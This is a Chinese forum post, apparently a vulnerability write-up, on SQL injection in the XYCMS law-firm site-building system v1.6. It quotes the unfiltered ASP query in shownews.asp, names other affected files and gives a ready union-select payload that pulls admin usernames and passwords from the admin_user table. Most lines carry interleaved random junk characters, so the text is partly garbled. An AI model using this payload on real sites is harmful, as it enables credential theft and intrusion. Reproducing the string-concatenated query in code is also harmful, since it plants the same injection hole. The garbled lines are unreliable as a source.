前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
& o, _7 Y* T: \# `0 o" m3 c- b
" d) a9 y: e% E+ b: ?5 J. u淫荡分割线
! Y/ b- w$ G; P) P6 {--------------------------------------------------------
( z% h r0 J5 g9 v& ^" K
' X5 n* N1 _: U0 L审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)9 c( N e0 ?3 e+ l1 @, O
源码地址:http://down.chinaz.com/soft/29233.htm
~; c8 E6 V* D2 R ! D7 f! K3 q, B7 L4 S7 T
漏洞文件:shownews.asp
. r( g( J. @2 Y5 D. C漏洞代码:7-13行- ^0 R- o7 y( y6 U
# y' d/ S7 F& U. Z
9 {4 d$ A: D% w$ i9 Q A. K
<% - z X0 Q9 C6 [7 |- y
id=request.QueryString("id")2 ^; k$ A3 v# s7 g! }
% z6 z1 n9 S/ \: U# G- }: {
set snews=server.createobject("adodb.recordset")
5 l5 h+ {& `! B7 o% Bexec="select * from [news] where id="&id. ]' G2 y/ ^ s0 `0 K( i
snews.open exec,conn,1,1
* f7 K5 l/ ~ O* _' F* n1 B%>2 G- N! e; F6 {# i' d: V% j! E" l
4 n( v: E8 U- g( D) \& G5 R0 ^- X
4 n/ b9 E! n5 j( B什么过滤都没有 直造成注入7 W" ?9 V; h6 F" i5 S5 G+ h7 k
. H8 [7 z& J( B
注入点:http://127.0.0.1:99/shownews.asp?id=xx! n9 y% H5 g7 T5 f7 k w
- [! ]" X( i' `; Q8 t
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找. f) m% N& @% R$ J1 ?3 ` F& }
! }, x+ l' _- O, N- A5 B3 t; t
% a$ M2 w. t2 N5 G0 M6 i
exp: union select 1,admin,password,4,5,7 from admin_user$ O( C5 |1 ]8 l+ H
# U; d& \1 z, O5 _" H) s3 m2 l |